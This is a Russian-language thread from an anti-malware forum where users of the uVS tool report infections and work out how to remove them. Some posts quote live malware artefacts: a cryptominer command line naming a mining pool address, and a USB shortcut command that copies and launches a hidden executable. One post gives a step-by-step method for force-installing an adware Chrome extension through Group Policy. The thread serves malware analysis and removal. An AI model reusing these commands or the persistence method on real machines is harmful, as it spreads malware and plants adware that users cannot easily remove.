Universal Virus Sniffer (uVS), Вопросы разработчику - Страница 60 - Universal Virus Sniffer (uVS) - развитие, использование и решение проблем - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

PR55.RP55

Demkd

Большая просьба...

http://www.anti-malware.ru/forum/index.php...st&p=175852

Я конечно понимаю - люди у нас терпеливые, морально устойчивые...

Но сколько можно ? :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

чистить темп не пробовал? плохая шутка ,я начал чистить темпы еще задолго до изобретения этой программы (в основном "батником")

с двумя слэшами давно уже не удаляются ссылки последняя версия пыталась удалить я даже сделал скрини но к сожалению удалил их вместе с другими .. я грешным делом подумал что это именно слеши виноваты...

ps жаль что из за погони за скоростью не хватает времени на исследование, создание образов и пр

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
g0dl1ke

спасибо demkd - при помощи uvs удалось задетектить майнер криптовалюты

https://www.virustotal.com/ru/file/903f8e19...sis/1390733179/

https://www.virustotal.com/ru/file/4ffdc458...sis/1390733181/

собственно опять авторан через шедулер (видимо сейчас это модно)

C:\Users\Alex\AppData\Roaming\Malwarebytes\chrome.exe" --scrypt -o stratum+tcp://37.1.219.68:9007 -u strizon.2 -p x -w 256 -I 11

образ машины: http://rghost.ru/private/51935781/36444fc9...32d522f54a39650

файлы конфигов майнера (если кому то это будет интересно): http://rghost.ru/private/51935937/78272e53...eaaf5d0e3df97a1

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

столкнулся с таким случаем удаляю вирусы программой они восстанавливаться после перезагрузки .

ситуация следующая : вирусы с компьютера превращают все папки на флешке в "невидимые" а вместо них лежат ярлычки (к этим папкам) эмитирующие эти папки ,а также в скрытом виде кладут вирус в корень флеши .

самое интересное это сами модифицированные ярлыки к папкам вот их содержимое :

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "%SystemRoot%\explorer.exe %cd%[b]название папки жертвы[/b] & attrib -s -h %cd%HKNVAsF.exe & xcopy /F /S /Q /H /R /Y %cd%HKNVAsF.exe %temp%\lrHwn\ & attrib +s +h %cd%HKNVAsF.exe & start %temp%\lrHwn\HKNVAsF.exe & exit"

программа конечно паказывает где лежать вирусы , а также в запуске "неявных или в ручную" тоже но почему при удалении вирусов не удаляются модифицированные ярлычки и посчемуто не палиться вирус на флешке !?

если автору будет интересно и свободное время могу выложить "тушки"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
если автору будет интересно и свободное время могу выложить "тушки"

Smit, эти "тушки" кто нибудь из антивирусов детектирует? как хоть называется детект? (если он есть)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
g0dl1ke

хотя бы отчет вирустотал бэ

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

ставлю на то, что детектов >20 :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

g0dl1ke

priv8v ставлю на то, что детектов >20 smile.gif

тоесть прога не детектит , на свалку ее? или к чему этот ваш стеб?

при чем тут детект вообще? удалять надо не только то что детектится , а еще и причину запуска вирусов как минимум, а как максимум восстановить работу системы как было!

воистину дети рекламы и нода

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
тоесть прога не детектит , на свалку ее? или к чему этот ваш стеб?

К demkd и его данной деятельности отношусь с уважением и стеба не было. Ссылка на ВТ нужна для того, чтоб все сразу было видно вообще что за файл. Если бы файл понадобился, то я бы его выдал нуждающимся и может какой мини-реверс сделал, коли потребовалось бы. А попытка угадать кол-во детектов - это наш междусобойный юмор (угадывать по имени файла и методу распространения уровень детекта). Разумеется ни кому в голову не приходит, что утилита должна все сигнатурно детектить - не перекладывайте свои мысли в головы других людей :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

priv8v не перекладывайте свои мысли в головы других людей

а я и не мыслил , что кто то мыслил, что я мыслил :"перекладывать мысли"

это могут только экстрасенсы и / или талантливые учителя , спс за лесть!

а если по делу вы ничего не хотели написать? к примеру если бы программа действительно могла удалять модифицированные ярлыки: если удаляется сам файл? или это роскошь!? если антивири этого не делают то и uvs не должен? и тут не нужно знать ни сигнатуры ни чего то особенного, если программа умеет удалять ссылки на удаляемый файл , пусть удаляет и ярлыки на негоже, весьма логично! (ярлык это тоже ссылка, невероятно но факт!)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

В системе скажем в директории \User Data\Default\Extensions\

Есть .JS объекты.

Этот: https://www.virustotal.com/ru/file/87e92171...sis/1391178703/

Дело в том, что после удаления данная дрянь восстанавливается...

И Браузер снова подгружает данное расширение.

Как средствами системы или uVS можно блокировать запуск этого объекта без отключения JavaScript. ?

7c7d.jpg

post-8956-1391179231_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

rghost.ru/52095809 :facepalm:

Для установке в Хроме: настройки > расширения > копируем файл на страницу > подтверждаем = получаем удовольствие.

Единственно с правами всё здесь попроще...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

До 28 версии так делалось через реестр с помощью ключей:

_ Software\Policies\Google\Chrome\ExtensionInstallSources

_ Software\Policies\Google\Chrome\ExtensionInstallForcelist

С 28 через политики windows (устанавливается шаблон). Реестр должен игнорироваться.

В адресной строке можно ввести chrome://policy и посмотреть, что покажет.

Установил выложенный на rghost.ru/52095809 через политики :

Image1.png

post-5047-1391199085_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

goover +

Спасибо за помощь.

Теперь дело за Demkd.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

htt*://mediaply.net/mediaplayer/update/updateMediaPlayerV1alpha257.xml

Где MediaPlayerV1alpha***

*** От 257 до 800

На google.com жуткая паника и шпионская паранойя с 30 числа....

Решение _они_ так за три дня и не нашли.

---

629.jpg

post-8956-1391237329_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
С 28 через политики windows (устанавливается шаблон). Реестр должен игнорироваться.

В адресной строке можно ввести chrome://policy и посмотреть, что покажет.

Установил выложенный на rghost.ru/52095809 через политики :

goover, а можно подробнее, как расширение добавлено через политики. (и где это инфо хранится)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Опишу как я делал ( Win 7 x32 , Chrome ver. 32 ) :

Тут шаблон политик для хрома: http://www.chromium.org/administrators/policy-templates ( скачать - Zip file of ADM/ADMX templates and documentation ). Из архива нужен - windows\adm\ru\chrome.adm. Добавляем его в gpedit.msc для всех юзеров:

- Конфигурация компьютера - Административные шаблоны. На 'Административные шаблоны' правой кнопкой мыши, в меню жмем 'Добавление и удаление шаблонов'. Добавляем chrome.adm.

На последнем скрине PR55.RP55 видно, что расширение грузится из интернета ( с mediaply.net ). Я грузил с рабочего стола.

Положил на него 3 файла: 1.1_0.crx, 1.1_0.pem (распаковал из архива с расширением) и создал файл update.xml с содержимым

                             <?xml version='1.0' encoding='UTF-8'?>                               <gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>                               <app appid='ojaliajcmgpnmmalbegllddmoimfnlle'>                                 <updatecheck codebase='file:///C:/Users/user/Desktop/1.1_0.crx' version='1.1' />                               </app>                             </gupdate>

Через gpedit.msc включаем и настраиваем политику:

gpedit_chrome.pnggpedit_chrome_2.png

Запускаем Chrome, открываем любые сайты и любуемся на рекламу и popup-ы.

Что в резальтате получилось:

1) политика сохранилась в реестре

             [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]               "1"="ojaliajcmgpnmmalbegllddmoimfnlle;file:///C:/Users/user/Desktop/update.xml"

2) политика сохранилась в C:\Users\All Users\ntuser.pol

3) политика сохранилась в C:\Windows\System32\GroupPolicy\Machine\Registry.pol

( может политики ещё где сохраняются, не знаю, в любом случае их надо отключать через соответствующий интерфейс, а не удалять файлы ntuser.pol, Registry.pol, ... :) ).

4) также в \User Data\Default\Extensions\ появилась папка "ojaliajcmgpnmmalbegllddmoimfnlle" с этим расширением.

Ключ в реестре и папку с расширением можно удалить - все равно при старте браузера расширение будет подключаться и работать.

Если писАть только в реестр

             [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]               "1"="ojaliajcmgpnmmalbegllddmoimfnlle;file:///C:/Users/user/Desktop/update.xml"

то расширение не подключается.

post-5047-1391280561_thumb.png

post-5047-1391280567_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
Ключ в реестре и папку с расширением можно удалить - все равно при старте браузера расширение будет подключаться и работать.

а если после удаления ключа перезагрузить систему? ;) или просто обновить политики gpupdate /force?

в v .10 что уже доступна для обновления ключ с политиками гугля сносится под корень 27-м твиком

а софт от гугля, да, сплошная дыра, спецов по безопасности походу у них вообще нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

удаление ключа (в реестре) в том числе с gpupdate & restart не решает проблему, политика продожает работать, расширение остается активным и защищенным корпоративной политикой.

---------------

(точнее, это видимо работает для Chrome c v <28.)

в v 32 помогает удаление файла registry.pol. в этом случае административный шаблон сохраняется, но добавленная ранее политика отключается.

т.е. удалять ключ политики следует не из реестра, а через очистку политики из файла registry.pol, если в нее добавляются полезные политики из других административных шаблонов.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover
а если после удаления ключа перезагрузить систему? ;) или просто обновить политики gpupdate /force?

ну так попробуйте ;)

https://code.google.com/p/chromium/issues/detail?id=259470

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

goover, в связи с этим вопрос:

политики добавленные из разных административных шаблонов все сохраняются в registry.pol, или для каждого шаблона будет свой файл *.pol?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Без понятия :)

Я не программист и не системный администратор. И так глубоко данный вопрос не исследовал. На него скорее demkd может ответить.

IMHO, все будут в registry.pol. Только, например, на работе у меня их три:

regpol.png

Если интересно - пробуйте и смотрите :

в дополнение к шаблону хрома можно поставить шаблон для firefox (http://sourceforge.net/projects/gpofirefox...ox.adm/download), включить там и там по политике, и посмотреть что получится. ;)

post-5047-1391681407_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

да, все пишется в Registry.pol

Ну и наконец, в папках Machine и User находятся файлы Registry.pol. Эти файлы появляются, когда в разделе «Административные шаблоны» (Administrative Templates) определяется какой-нибудь параметр. Файл Registry.pol тесно связан с административными шаблонами (.adm). Административные шаблоны содержат параметры реестра, которые возможно сконфигурировать с помощью групповых политик. Ключевое слово здесь – «возможно». Registry.pol содержит сконфигурированные параметры.

Когда вы открываете редактор политик, он создает временную ветвь реестра с двумя узлами: user и machine. Когда вы передвигаетесь по узлам «административных шаблонов» в редакторе политик, редактор политик показывает вам соответствующие разделы административных шаблонов (.adm), подгружая их динамически (после выбора соответствующего раздела шаблонов). Все просмотренные параметры кэшируются.

Когда вы выбираете какую-нибудь политику, редактор политики читает временную ветвь реестра для того, чтобы определить значение этой политики (параметра). Если во временной ветви нет значения, запрашивается значение по умолчанию из .adm файла. Если в .adm файле нет значения по умолчанию, запрашивается соответствующее клиентское расширение.

Все параметры (политики), которые вы определяете в процессе редактирования раздела «Административные шаблоны» GPO, сохраняются во временной ветви реестра. Когда вы закрываете редактор политик, ветвь реестра импортируется в соответствующие файлы Registry.pol (в папке user или machine).

Впоследствии при открытии редактора групповой политики в создаваемую временную ветвь реестра импортируются соответствующие файлы Registry.pol, чтобы вы видели текущие настройки политик.

from ru-board.com

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

Кто подскажет, чем отличается горячая клавиша Ctrl+Z (Отменить предыдущую команду (только при работе с образом)) от Alt+Backspace (Отменить предыдущую команду (только при работе с образом))?

ктото прокомментировал это так :

"ну если у вас вдруг сломалась клавиша Ctrl можно использовать другую комбинацию"

а если без шуток!??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Smit

ничем

goover

спасибо, вроде как я нашел как эти GPO прибивать программно и сразу во всех местах, включу в след версию и почему-то расширение само сносится... наверное так задумано :D

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • demkd
    • PR55.RP55
      И ещё это: https://www.comss.ru/page.php?id=18330 Это и на работе Образов с Live CD может сказаться ?
    • PR55.RP55
      Тема: https://www.comss.ru/page.php?id=18331    " Ошибка проявляется в том, что при закрытии окна программы с помощью кнопки Закрыть (X) процесс taskmgr.exe не завершается полностью. При повторном открытии Диспетчера задач предыдущий экземпляр продолжает работать в фоне, хотя окно не отображается. В результате со временем накапливаются несколько процессов, что приводит к избыточному потреблению ресурсов системы и снижению производительности... " и это натолкнуло на мыслю. Раз есть такая проблема с taskmgr - то это может повториться с "любой" другой программой... т.е. можно? Реализовать команды: " Обнаружить и завершить все нетипично активные экземпляры Системных процессов\программ".  и " Обнаружить и завершить все нетипично активные экземпляры не Системных...". Такое может быть и с браузерами - например Firefox - если есть две версии программы установленные в разные каталоги и пользователь их запускает - часто бывает неполное завершение. тогда жрёт всё и вся...  
    • Ego Dekker
      Компания ESET (/исэ́т/) ― лидер в области информационной безопасности ― сообщает об обновлении ESET HOME Security Essential и ESET HOME Security Premium, комплексных подписок для защиты устройств домашних пользователей, и ESET Small Business Security, решения для малого бизнеса.

      Среди новинок ― функция восстановления после атак программ-вымогателей, мониторинг микрофона и улучшения безопасности при просмотре веб-сайтов, а также VPN, который предотвращает нежелательное отслеживание, обеспечивая неограниченный доступ к онлайн-контенту. Поскольку мошенничество сегодня является глобальной угрозой для всех пользователей, ESET обеспечивает усовершенствованную защиту от различных мошеннических методов, противодействуя атакам из разных типов источников, включая SMS-сообщения, электронную почту, телефонные звонки, URL-адреса, QR-коды, вредоносные файлы и другие.

      Обновленная платформа ESET HOME также упрощает управление безопасностью, что облегчает пользователям защиту своих семей, а владельцам малого бизнеса позволяет точно отслеживать защищенные устройства, а также устанавливать программы безопасности на все устройства благодаря доступному и понятному интерфейсу. 

      «Как поставщик передовых решений для защиты цифровой жизни, ESET тщательно отслеживает текущую ситуацию с угрозами и соответственно разрабатывает свои решения по кибербезопасности, ― комментирует вице-президент ESET в сегменте домашних пользователей и Интернета вещей. ― Усиленная защита от мошенничества, новая функция восстановления после атак программ-вымогателей и многочисленные усовершенствования безопасности конфиденциальных данных делают продукты ESET для домашних пользователей и малых предприятий мощными комплексными решениями, которые сочетают минимальное влияние на продуктивность и простоту в использовании».

      Решения для домашних устройств и малого бизнеса защищают все основные операционные системы ― Windows, macOS, Android ― и поддерживают разные устройства умного дома. Кроме того, ESET Small Business Security также защищает серверы Windows.

      Основные улучшения для пользователей Windows:

      •    Добавлен VPN (теперь доступно в подписке ESET HOME Security Premium): функция защитит сетевое подключение благодаря анонимному IP-адресу, а безлимитная пропускная способность обеспечит неограниченный доступ к онлайн-контенту. Кроме Windows, VPN также доступен пользователям MacOS, Android и iOS.

      •    Усилена защита конфиденциальных данных (доступно в подписках ESET HOME Security Essential, ESET HOME Security Premium, ESET Small Business Security): новый мониторинг микрофона обнаруживает и уведомляет пользователей о несанкционированных попытках доступа к микрофону на устройствах Windows.

      •    Улучшена безопасность при использовании браузера (доступно в подписках ESET HOME Security Essential, ESET HOME Security Premium, ESET Small Business Security) для защиты от фишинга, мошенничества и вредоносных веб-сайтов. Эта функция сканирует воспроизводимый HTML-код в браузере, чтобы обнаружить вредоносное содержимое, которое не фиксируется на уровне сети и с помощью «черного» списка URL.

      •    Добавлено восстановление после атак программ-вымогателей (доступно в решении ESET Small Business Security): первоначально разработанная для крупного бизнеса, функция позволяет минимизировать ущерб, вызванный этими угрозами. Как только защита от программ-вымогателей выявляет потенциальную угрозу, функция восстановления после атак немедленно создает резервные копии файлов, а после устранения опасности восстанавливает файлы, эффективно возвращая систему в прежнее состояние. Основные улучшения для пользователей macOS (доступны в подписках ESET HOME Security Essential, ESET HOME Security Premium, ESET Small Business Security):

      •    Поддержка macOS 26 (Tahoe) позволяет использовать защиту на текущей версии macOS.

      •    Поддержка HTTPS & HTTP/3 улучшает безопасность пользователей в Интернете.

      •    Управление устройствами контролирует внешние устройства, подключенные к Mac. Функция помогает защитить от вредоносного программного обеспечения и несанкционированной передачи данных, ограничивая доступ к определенным типам или даже отдельным устройствам. Следует отметить, что эти усовершенствования помогут противодействовать постоянно совершенствующимся угрозам с особым акцентом на предотвращение. Компания ESET также считает чрезвычайно важным сочетание кибергигиены с удобной защитой, поскольку действительно эффективная кибербезопасность должна быть простой в настройке и управлении.

      Более подробная информация о многоуровневой защите устройств домашних пользователей и решении для малого бизнеса. Пресс-выпуск.
    • Ego Dekker
      ESET NOD32 Antivirus 19.0.11  (Windows 10/11, 64-разрядная)
              ESET Internet Security 19.0.11  (Windows 10/11, 64-разрядная)
              ESET Smart Security Premium 19.0.11  (Windows 10/11, 64-разрядная)
              ESET Security Ultimate 19.0.11  (Windows 10/11, 64-разрядная)
                                                                                  ● ● ● ●
              Руководство пользователя ESET NOD32 Antivirus 19  (PDF-файл)
              Руководство пользователя ESET Internet Security 19  (PDF-файл)
              Руководство пользователя ESET Smart Security Premium 19  (PDF-файл)
              Руководство пользователя ESET Security Ultimate 19  (PDF-файл)
              
      Полезные ссылки:
      Технологии ESET
      ESET Online Scanner
      Удаление антивирусов других компаний
      Как удалить антивирус 19-й версии полностью?
×